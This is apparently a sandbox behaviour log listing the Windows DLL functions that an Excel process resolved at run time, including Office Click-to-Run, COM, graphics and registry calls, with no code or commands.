DynamicLoader: ole32.dll/CoRegisterClassObject
DynamicLoader: ole32.dll/CoRevokeClassObject
DynamicLoader: ole32.dll/CoGetClassObject
DynamicLoader: ole32.dll/CoGetInstanceFromFile
DynamicLoader: ole32.dll/CoResumeClassObjects
DynamicLoader: ole32.dll/CoSuspendClassObjects
DynamicLoader: ole32.dll/OleInitialize
DynamicLoader: ole32.dll/OleUninitialize
DynamicLoader: ole32.dll/OleRegEnumFormatEtc
DynamicLoader: ole32.dll/OleRun
DynamicLoader: OLEAUT32.dll/RegisterActiveObject
DynamicLoader: OLEAUT32.dll/RevokeActiveObject
DynamicLoader: OLEAUT32.dll/GetActiveObject
DynamicLoader: kernel32.dll/CreateProcessW
DynamicLoader: kernel32.dll/CreateProcessA
DynamicLoader: kernel32.dll/WinExec
DynamicLoader: ADVAPI32.dll/CreateProcessAsUserW
DynamicLoader: ADVAPI32.dll/CreateProcessAsUserA
DynamicLoader: api-ms-win-core-synch-l1-2-0.dll/InitializeCriticalSectionEx
DynamicLoader: kernel32.dll/FlsAlloc
DynamicLoader: kernel32.dll/FlsSetValue
DynamicLoader: kernel32.dll/FlsAlloc
DynamicLoader: api-ms-win-core-synch-l1-2-0.dll/InitializeCriticalSectionEx
DynamicLoader: kernel32.dll/FlsGetValue
DynamicLoader: kernel32.dll/FlsSetValue
DynamicLoader: kernel32.dll/LCMapStringEx
DynamicLoader: api-ms-win-core-synch-l1-2-0.dll/InitializeCriticalSectionEx
DynamicLoader: kernel32.dll/FlsAlloc
DynamicLoader: kernel32.dll/FlsSetValue
DynamicLoader: kernel32.dll/FlsAlloc
DynamicLoader: kernel32.dll/FlsFree
DynamicLoader: kernel32.dll/FlsGetValue
DynamicLoader: kernel32.dll/FlsSetValue
DynamicLoader: kernel32.dll/InitializeCriticalSectionEx
DynamicLoader: kernel32.dll/InitOnceExecuteOnce
DynamicLoader: kernel32.dll/CreateEventExW
DynamicLoader: kernel32.dll/CreateSemaphoreW
DynamicLoader: kernel32.dll/CreateSemaphoreExW
DynamicLoader: kernel32.dll/CreateThreadpoolTimer
DynamicLoader: kernel32.dll/SetThreadpoolTimer
DynamicLoader: kernel32.dll/WaitForThreadpoolTimerCallbacks
DynamicLoader: kernel32.dll/CloseThreadpoolTimer
DynamicLoader: kernel32.dll/CreateThreadpoolWait
DynamicLoader: kernel32.dll/SetThreadpoolWait
DynamicLoader: kernel32.dll/CloseThreadpoolWait
DynamicLoader: kernel32.dll/FlushProcessWriteBuffers
DynamicLoader: kernel32.dll/FreeLibraryWhenCallbackReturns
DynamicLoader: kernel32.dll/GetCurrentProcessorNumber
DynamicLoader: kernel32.dll/CreateSymbolicLinkW
DynamicLoader: kernel32.dll/GetCurrentPackageId
DynamicLoader: kernel32.dll/GetTickCount64
DynamicLoader: kernel32.dll/GetFileInformationByHandleEx
DynamicLoader: kernel32.dll/SetFileInformationByHandle
DynamicLoader: kernel32.dll/GetSystemTimePreciseAsFileTime
DynamicLoader: kernel32.dll/InitializeConditionVariable
DynamicLoader: kernel32.dll/WakeConditionVariable
DynamicLoader: kernel32.dll/WakeAllConditionVariable
DynamicLoader: kernel32.dll/SleepConditionVariableCS
DynamicLoader: kernel32.dll/InitializeSRWLock
DynamicLoader: kernel32.dll/AcquireSRWLockExclusive
DynamicLoader: kernel32.dll/TryAcquireSRWLockExclusive
DynamicLoader: kernel32.dll/ReleaseSRWLockExclusive
DynamicLoader: kernel32.dll/SleepConditionVariableSRW
DynamicLoader: kernel32.dll/CreateThreadpoolWork
DynamicLoader: kernel32.dll/SubmitThreadpoolWork
DynamicLoader: kernel32.dll/CloseThreadpoolWork
DynamicLoader: kernel32.dll/CompareStringEx
DynamicLoader: kernel32.dll/GetLocaleInfoEx
DynamicLoader: kernel32.dll/LCMapStringEx
DynamicLoader: api-ms-win-core-synch-l1-2-0.dll/InitializeConditionVariable
DynamicLoader: api-ms-win-core-synch-l1-2-0.dll/SleepConditionVariableCS
DynamicLoader: api-ms-win-core-synch-l1-2-0.dll/WakeAllConditionVariable
DynamicLoader: USER32.dll/GetDC
DynamicLoader: GDI32.dll/GetDeviceCaps
DynamicLoader: USER32.dll/ReleaseDC
DynamicLoader: mso20win32client.dll/
DynamicLoader: CRYPTBASE.dll/SystemFunction036
DynamicLoader: USER32.dll/WaitForInputIdle
DynamicLoader: mso.dll/
DynamicLoader: mso30win32client.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso98win32client.dll/
DynamicLoader: mso.dll/
DynamicLoader: ADVAPI32.dll/EventSetInformation
DynamicLoader: c2r32.dll/SaveRecording
DynamicLoader: c2r32.dll/GetTotalProgress
DynamicLoader: c2r32.dll/IsClick2Run
DynamicLoader: c2r32.dll/C2rVersion
DynamicLoader: c2r32.dll/IsRoaming
DynamicLoader: c2r32.dll/IsOSPPReady
DynamicLoader: c2r32.dll/IsStreaming
DynamicLoader: c2r32.dll/ClearPropertyBagValue
DynamicLoader: c2r32.dll/SetPropertyBagToken
DynamicLoader: c2r32.dll/InstallProofOfPurchase
DynamicLoader: c2r32.dll/UninstallProofOfPurchase
DynamicLoader: c2r32.dll/HandleScheduledHeartbeat
DynamicLoader: c2r32.dll/MigrateOSPPToSPP
DynamicLoader: c2r32.dll/LicenseRepair
DynamicLoader: c2r32.dll/StartScenario
DynamicLoader: c2r32.dll/StartFB
DynamicLoader: c2r32.dll/WaitFB
DynamicLoader: c2r32.dll/GetProperty
DynamicLoader: c2r32.dll/GetPackageRoot
DynamicLoader: c2r32.dll/GetInstalledProducts
DynamicLoader: c2r32.dll/AddOfficeProduct
DynamicLoader: c2r32.dll/Launch
DynamicLoader: c2r32.dll/EnsureConnection
DynamicLoader: c2r32.dll/GetUpdateStatus
DynamicLoader: c2r32.dll/HrUpdateNow
DynamicLoader: c2r32.dll/SaveRecording
DynamicLoader: c2r32.dll/GetStatusValue
DynamicLoader: c2r32.dll/HrGetAreUpdatesEnabled
DynamicLoader: c2r32.dll/HrGetAreUpdatesCOMManaged
DynamicLoader: c2r32.dll/HrGetAreUpdatesFromAdminSource
DynamicLoader: c2r32.dll/HrGetAreUpdatesReadyForDownload
DynamicLoader: c2r32.dll/HrGetAreUpdatesReadyToApply
DynamicLoader: c2r32.dll/HrGetExecutingScenario
DynamicLoader: c2r32.dll/HrSetAreUpdatesEnabled
DynamicLoader: c2r32.dll/HrSetAreUpdatesFromAdminSource
DynamicLoader: c2r32.dll/HrApplyUpdatesNow
DynamicLoader: c2r32.dll/HrDownloadUpdatesNow
DynamicLoader: c2r32.dll/HrRefreshState
DynamicLoader: c2r32.dll/IsRepairRequired
DynamicLoader: c2r32.dll/Repair
DynamicLoader: c2r32.dll/StartProgressAgent
DynamicLoader: c2r32.dll/MarkFinalIntegrateComplete
DynamicLoader: c2r32.dll/HrBeginUpdatesDiscoveryPeriod
DynamicLoader: c2r32.dll/HrGetAreUpdatesLate
DynamicLoader: c2r32.dll/HrGetPendingUpdateDeadline
DynamicLoader: c2r32.dll/HrModifyOfficeProducts
DynamicLoader: c2r32.dll/HrGetChannelIdForDisplay
DynamicLoader: c2r32.dll/HrActivate
DynamicLoader: USER32.dll/GetThreadDpiAwarenessContext
DynamicLoader: ADVAPI32.dll/RegOpenKeyExA
DynamicLoader: ADVAPI32.dll/RegOpenKeyExW
DynamicLoader: ole32.dll/StringFromGUID2
DynamicLoader: msi.dll/
DynamicLoader: msi.dll/
DynamicLoader: msi.dll/
DynamicLoader: ADVAPI32.dll/CheckTokenMembership
DynamicLoader: msi.dll/
DynamicLoader: msi.dll/
DynamicLoader: kernel32.dll/GetFileAttributesExW
DynamicLoader: msi.dll/
DynamicLoader: USER32.dll/GetKeyboardLayoutList
DynamicLoader: ADVAPI32.dll/EventRegister
DynamicLoader: ADVAPI32.dll/RegOpenKeyExA
DynamicLoader: d2d1.dll/
DynamicLoader: kernel32.dll/WerRegisterMemoryBlock
DynamicLoader: kernel32.dll/QueryActCtxW
DynamicLoader: kernel32.dll/ActivateActCtx
DynamicLoader: kernel32.dll/FindActCtxSectionStringW
DynamicLoader: kernel32.dll/DeactivateActCtx
DynamicLoader: USER32.dll/RegisterClassExW
DynamicLoader: USER32.dll/RegisterWindowMessageW
DynamicLoader: USER32.dll/CreateWindowExW
DynamicLoader: uxtheme.dll/ThemeInitApiHook
DynamicLoader: USER32.dll/IsProcessDPIAware
DynamicLoader: USER32.dll/GetWindowLongW
DynamicLoader: USER32.dll/DefWindowProcW
DynamicLoader: USER32.dll/SetWindowLongW
DynamicLoader: WTSAPI32.dll/WTSRegisterSessionNotification
DynamicLoader: USER32.dll/IsWindow
DynamicLoader: USER32.dll/GetWindowThreadProcessId
DynamicLoader: WINSTA.dll/WinStationRegisterConsoleNotification
DynamicLoader: ADVAPI32.dll/LookupAccountSidW
DynamicLoader: ADVAPI32.dll/CreateWellKnownSid
DynamicLoader: RPCRT4.dll/RpcStringBindingComposeW
DynamicLoader: RPCRT4.dll/RpcBindingFromStringBindingW
DynamicLoader: RPCRT4.dll/RpcStringFreeW
DynamicLoader: RPCRT4.dll/RpcBindingSetAuthInfoExW
DynamicLoader: RPCRT4.dll/RpcAsyncInitializeHandle
DynamicLoader: RPCRT4.dll/NdrClientCall2
DynamicLoader: RPCRT4.dll/NdrAsyncClientCall
DynamicLoader: USER32.dll/GetSystemMetrics
DynamicLoader: dxgi.dll/CreateDXGIFactory1
DynamicLoader: GDI32.dll/D3DKMTOpenAdapterFromGdiDisplayName
DynamicLoader: GDI32.dll/D3DKMTCloseAdapter
DynamicLoader: GDI32.dll/D3DKMTQueryAdapterInfo
DynamicLoader: GDI32.dll/D3DKMTOpenAdapterFromDeviceName
DynamicLoader: setupapi.dll/SetupDiGetClassDevsW
DynamicLoader: setupapi.dll/SetupDiEnumDeviceInterfaces
DynamicLoader: setupapi.dll/SetupDiGetDeviceInterfaceDetailW
DynamicLoader: setupapi.dll/SetupDiDestroyDeviceInfoList
DynamicLoader: setupapi.dll/SetupDiGetDevicePropertyW
DynamicLoader: WINTRUST.dll/WinVerifyTrust
DynamicLoader: setupapi.dll/SetupDiGetClassDevsW
DynamicLoader: setupapi.dll/SetupDiEnumDeviceInterfaces
DynamicLoader: setupapi.dll/SetupDiGetDeviceInterfaceDetailW
DynamicLoader: setupapi.dll/SetupDiDestroyDeviceInfoList
DynamicLoader: setupapi.dll/SetupDiGetDevicePropertyW
DynamicLoader: WINTRUST.dll/WinVerifyTrust
DynamicLoader: GDI32.dll/D3DKMTOpenAdapterFromGdiDisplayName
DynamicLoader: GDI32.dll/D3DKMTOpenAdapterFromDeviceName
DynamicLoader: GDI32.dll/D3DKMTCloseAdapter
DynamicLoader: GDI32.dll/D3DKMTQueryAdapterInfo
DynamicLoader: ADVAPI32.dll/EventRegister
DynamicLoader: ADVAPI32.dll/RegOpenKeyExA
DynamicLoader: VERSION.dll/GetFileVersionInfoSizeW
DynamicLoader: VERSION.dll/GetFileVersionInfoW
DynamicLoader: VERSION.dll/VerQueryValueW
DynamicLoader: ADVAPI32.dll/RegCloseKey
DynamicLoader: ADVAPI32.dll/RegOpenKeyExA
DynamicLoader: USER32.dll/BeginPaint
DynamicLoader: USER32.dll/ValidateRect
DynamicLoader: USER32.dll/GetAsyncKeyState
DynamicLoader: ADVAPI32.dll/RegCreateKeyExA
DynamicLoader: ADVAPI32.dll/RegQueryValueExA
DynamicLoader: ADVAPI32.dll/RegSetValueExA
DynamicLoader: ADVAPI32.dll/RegCloseKey
DynamicLoader: mso20win32client.dll/
DynamicLoader: mso98win32client.dll/
DynamicLoader: mso98win32client.dll/
DynamicLoader: mso20win32client.dll/
DynamicLoader: mso30win32client.dll/
DynamicLoader: mso98win32client.dll/
DynamicLoader: mso30win32client.dll/
DynamicLoader: mso30win32client.dll/
DynamicLoader: mso30win32client.dll/
DynamicLoader: mso30win32client.dll/
DynamicLoader: mso30win32client.dll/
DynamicLoader: mso30win32client.dll/
DynamicLoader: mso30win32client.dll/
DynamicLoader: mso30win32client.dll/
DynamicLoader: mso30win32client.dll/
DynamicLoader: mso30win32client.dll/
DynamicLoader: mso20win32client.dll/
DynamicLoader: mso20win32client.dll/
DynamicLoader: mso20win32client.dll/
DynamicLoader: mso30win32client.dll/
DynamicLoader: mso20win32client.dll/
DynamicLoader: mso20win32client.dll/
DynamicLoader: mso30win32client.dll/
DynamicLoader: mso30win32client.dll/
DynamicLoader: mso30win32client.dll/
DynamicLoader: mso20win32client.dll/
DynamicLoader: mso20win32client.dll/
DynamicLoader: mso30win32client.dll/
DynamicLoader: mso30win32client.dll/
DynamicLoader: USER32.dll/RegisterWindowMessageA
DynamicLoader: mso30win32client.dll/
DynamicLoader: mso20win32client.dll/
DynamicLoader: mso20win32client.dll/
DynamicLoader: c2r32.dll/SaveRecording
DynamicLoader: mso40uiwin32client.dll/
DynamicLoader: ADVAPI32.dll/EventSetInformation
DynamicLoader: c2r32.dll/SaveRecording
DynamicLoader: USER32.dll/LoadIconW
DynamicLoader: USER32.dll/LoadCursorW
DynamicLoader: mso40uiwin32client.dll/
DynamicLoader: mso20win32client.dll/
DynamicLoader: mso20win32client.dll/
DynamicLoader: GDI32.dll/CreateRectRgn
DynamicLoader: mso40uiwin32client.dll/
DynamicLoader: USER32.dll/GetSysColor
DynamicLoader: mso98win32client.dll/
DynamicLoader: ADVAPI32.dll/RegOpenKeyExW
DynamicLoader: ADVAPI32.dll/RegCreateKeyExW
DynamicLoader: GDI32.dll/D3DKMTOpenAdapterFromGdiDisplayName
DynamicLoader: GDI32.dll/D3DKMTCloseAdapter
DynamicLoader: GDI32.dll/D3DKMTQueryAdapterInfo
DynamicLoader: GDI32.dll/D3DKMTOpenAdapterFromDeviceName
DynamicLoader: setupapi.dll/SetupDiGetClassDevsW
DynamicLoader: ADVAPI32.dll/RegQueryValueExW
DynamicLoader: setupapi.dll/SetupDiDestroyDeviceInfoList
DynamicLoader: setupapi.dll/SetupDiGetDevicePropertyW
DynamicLoader: ADVAPI32.dll/RegQueryInfoKeyW
DynamicLoader: WINTRUST.dll/WinVerifyTrust
DynamicLoader: ADVAPI32.dll/RegSetValueExW
DynamicLoader: setupapi.dll/SetupDiGetClassDevsW
DynamicLoader: ADVAPI32.dll/RegEnumKeyExW
DynamicLoader: setupapi.dll/SetupDiGetDeviceInterfaceDetailW
DynamicLoader: setupapi.dll/SetupDiDestroyDeviceInfoList
DynamicLoader: setupapi.dll/SetupDiGetDevicePropertyW
DynamicLoader: d3d11.dll/D3D11CreateDevice
DynamicLoader: SHELL32.dll/SHGetFolderPathW
DynamicLoader: dxgi.dll/CompatValue
DynamicLoader: GDI32.dll/D3DKMTOpenAdapterFromGdiDisplayName
DynamicLoader: GDI32.dll/D3DKMTCloseAdapter
DynamicLoader: GDI32.dll/D3DKMTQueryAdapterInfo
DynamicLoader: GDI32.dll/D3DKMTOpenAdapterFromDeviceName
DynamicLoader: setupapi.dll/SetupDiGetClassDevsW
DynamicLoader: setupapi.dll/SetupDiEnumDeviceInterfaces
DynamicLoader: setupapi.dll/SetupDiGetDeviceInterfaceDetailW
DynamicLoader: setupapi.dll/SetupDiDestroyDeviceInfoList
DynamicLoader: setupapi.dll/SetupDiGetDevicePropertyW
DynamicLoader: WINTRUST.dll/WinVerifyTrust
DynamicLoader: setupapi.dll/SetupDiGetClassDevsW
DynamicLoader: USER32.dll/LoadCursorW
DynamicLoader: setupapi.dll/SetupDiDestroyDeviceInfoList
DynamicLoader: setupapi.dll/SetupDiGetDevicePropertyW
DynamicLoader: USER32.dll/LoadCursorW
DynamicLoader: kernel32.dll/QueryActCtxW
DynamicLoader: kernel32.dll/GetModuleHandleExW
DynamicLoader: kernel32.dll/CreateActCtxW
DynamicLoader: WINTRUST.dll/WinVerifyTrust
DynamicLoader: GDI32.dll/D3DKMTOpenAdapterFromGdiDisplayName
DynamicLoader: GDI32.dll/D3DKMTOpenAdapterFromDeviceName
DynamicLoader: GDI32.dll/D3DKMTCloseAdapter
DynamicLoader: GDI32.dll/D3DKMTQueryAdapterInfo
DynamicLoader: D3D10Warp.dll/D3DKMTGetThunkVersion
DynamicLoader: D3D10Warp.dll/D3DKMTOpenAdapterFromGdiDisplayName
DynamicLoader: D3D10Warp.dll/D3DKMTOpenAdapterFromDeviceName
DynamicLoader: D3D10Warp.dll/D3DKMTGetDisplayModeList
DynamicLoader: D3D10Warp.dll/D3DKMTSetVidPnSourceOwner
DynamicLoader: D3D10Warp.dll/D3DKMTSetDisplayMode
DynamicLoader: D3D10Warp.dll/D3DKMTCloseAdapter
DynamicLoader: D3D10Warp.dll/D3DKMTSetGammaRamp
DynamicLoader: D3D10Warp.dll/D3DKMTGetDeviceState
DynamicLoader: D3D10Warp.dll/D3DKMTQueryAdapterInfo
DynamicLoader: D3D10Warp.dll/D3DKMTWaitForVerticalBlankEvent
DynamicLoader: GDI32.dll/D3DKMTCreateDCFromMemory
DynamicLoader: GDI32.dll/D3DKMTDestroyDCFromMemory
DynamicLoader: GDI32.dll/D3DKMTCheckVidPnExclusiveOwnership
DynamicLoader: GDI32.dll/D3DKMTCheckMonitorPowerState
DynamicLoader: GDI32.dll/D3DKMTCheckSharedResourceAccess
DynamicLoader: kernel32.dll/ActivateActCtx
DynamicLoader: kernel32.dll/FindActCtxSectionStringW
DynamicLoader: D3D10Warp.dll/D3DKMTSetQueuedLimit
DynamicLoader: D3D10Warp.dll/D3DKMTGetMultisampleMethodList
DynamicLoader: D3D10Warp.dll/D3DKMTQueryAdapterInfo
DynamicLoader: mso.dll/
DynamicLoader: D3D10Warp.dll/D3DKMTSetDisplayPrivateDriverFormat
DynamicLoader: D3D10Warp.dll/D3DKMTDestroySynchronizationObject
DynamicLoader: D3D10Warp.dll/D3DKMTCreateSynchronizationObject
DynamicLoader: D3D10Warp.dll/D3DKMTDestroyContext
DynamicLoader: D3D10Warp.dll/D3DKMTCreateContext
DynamicLoader: D3D10Warp.dll/D3DKMTGetContextSchedulingPriority
DynamicLoader: D3D10Warp.dll/D3DKMTSetContextSchedulingPriority
DynamicLoader: D3D10Warp.dll/D3DKMTPresent
DynamicLoader: D3D10Warp.dll/D3DKMTDestroyDevice
DynamicLoader: D3D10Warp.dll/D3DKMTCreateDevice
DynamicLoader: D3D10Warp.dll/D3DKMTQueryAllocationResidency
DynamicLoader: D3D10Warp.dll/D3DKMTSetAllocationPriority
DynamicLoader: D3D10Warp.dll/D3DKMTDestroyAllocation
DynamicLoader: D3D10Warp.dll/D3DKMTOpenResource
DynamicLoader: D3D10Warp.dll/D3DKMTQueryResourceInfo
DynamicLoader: D3D10Warp.dll/D3DKMTCreateAllocation
DynamicLoader: D3D10Warp.dll/D3DKMTGetDeviceState
DynamicLoader: D3D10Warp.dll/D3DKMTSetDisplayMode
DynamicLoader: D3D10Warp.dll/D3DKMTSignalSynchronizationObject
DynamicLoader: D3D10Warp.dll/D3DKMTWaitForSynchronizationObject
DynamicLoader: D3D10Warp.dll/D3DKMTEscape
DynamicLoader: D3D10Warp.dll/D3DKMTUnlock
DynamicLoader: D3D10Warp.dll/OpenAdapter10_2
DynamicLoader: USER32.dll/GetSystemMetrics
DynamicLoader: D3D10Warp.dll/
DynamicLoader: mso20win32client.dll/
DynamicLoader: USER32.dll/SystemParametersInfoW
DynamicLoader: D3D10Warp.dll/
DynamicLoader: USER32.dll/CreateWindowExW
DynamicLoader: mso20win32client.dll/
DynamicLoader: mso20win32client.dll/
DynamicLoader: USER32.dll/GetCursorPos
DynamicLoader: mso.dll/
DynamicLoader: mso20win32client.dll/
DynamicLoader: mso98win32client.dll/
DynamicLoader: mso98win32client.dll/
DynamicLoader: mso20win32client.dll/
DynamicLoader: mso.dll/
DynamicLoader: D3D10Warp.dll/
DynamicLoader: mso20win32client.dll/
DynamicLoader: D3D10Warp.dll/
DynamicLoader: ADVAPI32.dll/RegCreateKeyExA
DynamicLoader: ADVAPI32.dll/RegOpenKeyExW
DynamicLoader: D3D10Warp.dll/
DynamicLoader: ADVAPI32.dll/RegQueryValueExW
DynamicLoader: ADVAPI32.dll/RegCloseKey
DynamicLoader: mso20win32client.dll/
DynamicLoader: GDI32.dll/GetObjectType
DynamicLoader: mso30win32client.dll/
DynamicLoader: mso30win32client.dll/
DynamicLoader: mso20win32client.dll/
DynamicLoader: EXCEL.EXE/VKKEYSCAN
DynamicLoader: USER32.dll/RegisterClipboardFormatW
DynamicLoader: USER32.dll/RegisterClipboardFormatW
DynamicLoader: mso20win32client.dll/
DynamicLoader: mso40uiwin32client.dll/
DynamicLoader: mso20win32client.dll/
DynamicLoader: GDI32.dll/CreateBrushIndirect
DynamicLoader: mso40uiwin32client.dll/
DynamicLoader: ADVAPI32.dll/EventProviderEnabled
DynamicLoader: GDI32.dll/CreateFontIndirectW
DynamicLoader: mso20win32client.dll/
DynamicLoader: GDI32.dll/GetCurrentObject
DynamicLoader: mso40uiwin32client.dll/
DynamicLoader: mso40uiwin32client.dll/
DynamicLoader: USER32.dll/RegisterClassExW
DynamicLoader: mso.dll/
DynamicLoader: mso98win32client.dll/
DynamicLoader: mso40uiwin32client.dll/
DynamicLoader: mso.dll/
DynamicLoader: kernel32.dll/QueryActCtxW
DynamicLoader: kernel32.dll/ActivateActCtx
DynamicLoader: kernel32.dll/FindActCtxSectionStringW
DynamicLoader: kernel32.dll/DeactivateActCtx
DynamicLoader: USER32.dll/RegisterClassExW
DynamicLoader: IMM32.DLL/ImmDisableIME
DynamicLoader: kernel32.dll/IsProcessorFeaturePresent
DynamicLoader: USER32.dll/GetWindowInfo
DynamicLoader: USER32.dll/GetAncestor
DynamicLoader: USER32.dll/GetMonitorInfoA
DynamicLoader: USER32.dll/EnumDisplayMonitors
DynamicLoader: USER32.dll/EnumDisplayDevicesA
DynamicLoader: GDI32.dll/ExtTextOutW
DynamicLoader: GDI32.dll/GdiIsMetaPrintDC
DynamicLoader: USER32.dll/LoadCursorW
DynamicLoader: mscoree.dll/GetRequestedRuntimeInfo
DynamicLoader: ADVAPI32.dll/RegOpenKeyExW
DynamicLoader: ADVAPI32.dll/RegQueryInfoKeyW
DynamicLoader: ADVAPI32.dll/RegEnumKeyExW
DynamicLoader: ADVAPI32.dll/RegEnumValueW
DynamicLoader: ADVAPI32.dll/RegCloseKey
DynamicLoader: ADVAPI32.dll/RegQueryValueExW
DynamicLoader: ADVAPI32.dll/RegQueryValueExW
DynamicLoader: mscoreei.dll/RegisterShimImplCallback
DynamicLoader: mscoreei.dll/RegisterShimImplCleanupCallback
DynamicLoader: mscoreei.dll/SetShellShimInstance
DynamicLoader: mscoreei.dll/OnShimDllMainCalled
DynamicLoader: mscoreei.dll/GetRequestedRuntimeInfo_RetAddr
DynamicLoader: mscoreei.dll/GetRequestedRuntimeInfo
DynamicLoader: SHLWAPI.dll/UrlIsW
DynamicLoader: ADVAPI32.dll/RegQueryInfoKeyW
DynamicLoader: ADVAPI32.dll/RegEnumValueW
DynamicLoader: VERSION.dll/GetFileVersionInfoSizeW
DynamicLoader: VERSION.dll/GetFileVersionInfoW
DynamicLoader: VERSION.dll/VerQueryValueW
DynamicLoader: mscoree.dll/LockClrVersion
DynamicLoader: mscoree.dll/CLRCreateInstance
DynamicLoader: mscoreei.dll/LockClrVersion_RetAddr
DynamicLoader: mscoreei.dll/LockClrVersion
DynamicLoader: mscoreei.dll/CLRCreateInstance
DynamicLoader: DWrite.dll/DWriteCreateFactory
DynamicLoader: USER32.dll/GetDC
DynamicLoader: GDI32.dll/GetDeviceCaps
DynamicLoader: GDI32.dll/GetObjectType
DynamicLoader: USER32.dll/RegisterClipboardFormatA
DynamicLoader: kernel32.dll/QueryActCtxW
DynamicLoader: kernel32.dll/ActivateActCtx
DynamicLoader: kernel32.dll/FindActCtxSectionStringW
DynamicLoader: kernel32.dll/DeactivateActCtx
DynamicLoader: USER32.dll/RegisterClassA
DynamicLoader: USER32.dll/RegisterClassW
DynamicLoader: USER32.dll/CallNextHookEx
DynamicLoader: ADVAPI32.dll/EventSetInformation
DynamicLoader: USER32.dll/RegisterWindowMessageW
DynamicLoader: USER32.dll/RegisterWindowMessageA
DynamicLoader: riched20.dll/REMSOHInst
DynamicLoader: riched20.dll/REExtendedRegisterClass
DynamicLoader: ole32.dll/CoRegisterActivationFilter
DynamicLoader: SHELL32.dll/SetCurrentProcessExplicitAppUserModelID
DynamicLoader: USER32.dll/RegisterWindowMessageA
DynamicLoader: GDI32.dll/CreateBitmap
DynamicLoader: GDI32.dll/CreatePatternBrush
DynamicLoader: GDI32.dll/DeleteObject
DynamicLoader: ole32.dll/OleLoadFromStream
DynamicLoader: OLEAUT32.dll/SysAllocStringByteLen
DynamicLoader: OLEAUT32.dll/SysFreeString
DynamicLoader: OLEAUT32.dll/VariantChangeType
DynamicLoader: OLEAUT32.dll/VariantClear
DynamicLoader: SHELL32.dll/SHParseDisplayName
DynamicLoader: USER32.dll/CreateWindowExA
DynamicLoader: USER32.dll/DefWindowProcA
DynamicLoader: USER32.dll/RegisterWindowMessageA
DynamicLoader: USER32.dll/AddClipboardFormatListener
DynamicLoader: USER32.dll/PostMessageA
DynamicLoader: USER32.dll/IsWindowUnicode
DynamicLoader: USER32.dll/PostMessageA
DynamicLoader: ADVAPI32.dll/RegCreateKeyExW
DynamicLoader: c2r32.dll/SaveRecording
DynamicLoader: ADVAPI32.dll/RegQueryInfoKeyW
DynamicLoader: ADVAPI32.dll/CredEnumerateW
DynamicLoader: OLEAUT32.dll/
DynamicLoader: WS2_32.dll/
DynamicLoader: ole32.dll/CoSetProxyBlanket
DynamicLoader: Normaliz.dll/IdnToAscii
DynamicLoader: ADVAPI32.dll/RegCreateKeyExW
DynamicLoader: urlmon.dll/CoInternetCreateSecurityManager
DynamicLoader: Normaliz.dll/IdnToAscii
DynamicLoader: ADVAPI32.dll/RegEnumValueW
DynamicLoader: c2r32.dll/SaveRecording
DynamicLoader: USER32.dll/PostMessageW
DynamicLoader: Secur32.dll/GetUserNameExW
DynamicLoader: c2r32.dll/GetTotalProgress
DynamicLoader: c2r32.dll/IsClick2Run
DynamicLoader: c2r32.dll/C2rVersion
DynamicLoader: c2r32.dll/IsRoaming
DynamicLoader: c2r32.dll/IsOSPPReady
DynamicLoader: c2r32.dll/IsStreaming
DynamicLoader: c2r32.dll/ClearPropertyBagValue
DynamicLoader: c2r32.dll/SetPropertyBagToken
DynamicLoader: c2r32.dll/InstallProofOfPurchase
DynamicLoader: c2r32.dll/UninstallProofOfPurchase
DynamicLoader: c2r32.dll/HandleScheduledHeartbeat
DynamicLoader: c2r32.dll/MigrateOSPPToSPP
DynamicLoader: c2r32.dll/LicenseRepair
DynamicLoader: c2r32.dll/StartScenario
DynamicLoader: c2r32.dll/StartFB
DynamicLoader: c2r32.dll/WaitFB
DynamicLoader: c2r32.dll/GetProperty
DynamicLoader: c2r32.dll/GetPackageRoot
DynamicLoader: c2r32.dll/GetInstalledProducts
DynamicLoader: c2r32.dll/AddOfficeProduct
DynamicLoader: c2r32.dll/Launch
DynamicLoader: c2r32.dll/EnsureConnection
DynamicLoader: c2r32.dll/GetUpdateStatus
DynamicLoader: c2r32.dll/HrUpdateNow
DynamicLoader: c2r32.dll/SaveRecording
DynamicLoader: c2r32.dll/GetStatusValue
DynamicLoader: c2r32.dll/HrGetAreUpdatesEnabled
DynamicLoader: c2r32.dll/HrGetAreUpdatesCOMManaged
DynamicLoader: c2r32.dll/HrGetAreUpdatesFromAdminSource
DynamicLoader: c2r32.dll/HrGetAreUpdatesReadyForDownload
DynamicLoader: c2r32.dll/HrGetAreUpdatesReadyToApply
DynamicLoader: c2r32.dll/HrRefreshState
DynamicLoader: c2r32.dll/IsRepairRequired
DynamicLoader: c2r32.dll/Repair
DynamicLoader: c2r32.dll/StartProgressAgent
DynamicLoader: c2r32.dll/MarkFinalIntegrateComplete
DynamicLoader: c2r32.dll/HrBeginUpdatesDiscoveryPeriod
DynamicLoader: c2r32.dll/HrGetAreUpdatesLate
DynamicLoader: c2r32.dll/HrGetPendingUpdateDeadline
DynamicLoader: c2r32.dll/HrModifyOfficeProducts
DynamicLoader: c2r32.dll/HrGetChannelIdForDisplay
DynamicLoader: c2r32.dll/HrActivate
DynamicLoader: c2r32.dll/GetPropertyEx
DynamicLoader: c2r32.dll/GetPackageRoot
DynamicLoader: c2r32.dll/GetInstalledProducts
DynamicLoader: c2r32.dll/AddOfficeProduct
DynamicLoader: c2r32.dll/Launch
DynamicLoader: c2r32.dll/EnsureConnection
DynamicLoader: c2r32.dll/GetUpdateStatus
DynamicLoader: c2r32.dll/HrUpdateNow
DynamicLoader: c2r32.dll/SaveRecording
DynamicLoader: c2r32.dll/GetStatusValue
DynamicLoader: c2r32.dll/HrGetAreUpdatesEnabled
DynamicLoader: c2r32.dll/HrGetAreUpdatesCOMManaged
DynamicLoader: c2r32.dll/HrGetAreUpdatesFromAdminSource
DynamicLoader: c2r32.dll/HrGetAreUpdatesReadyForDownload
DynamicLoader: c2r32.dll/HrGetAreUpdatesReadyToApply
DynamicLoader: c2r32.dll/HrGetExecutingScenario
DynamicLoader: c2r32.dll/HrSetAreUpdatesEnabled
DynamicLoader: c2r32.dll/HrSetAreUpdatesFromAdminSource
DynamicLoader: c2r32.dll/HrApplyUpdatesNow
DynamicLoader: c2r32.dll/HrDownloadUpdatesNow
DynamicLoader: c2r32.dll/HrRefreshState
DynamicLoader: c2r32.dll/IsRepairRequired
DynamicLoader: c2r32.dll/Repair
DynamicLoader: c2r32.dll/StartProgressAgent
DynamicLoader: c2r32.dll/MarkFinalIntegrateComplete
DynamicLoader: c2r32.dll/HrBeginUpdatesDiscoveryPeriod
DynamicLoader: c2r32.dll/HrGetAreUpdatesLate
DynamicLoader: c2r32.dll/HrGetPendingUpdateDeadline
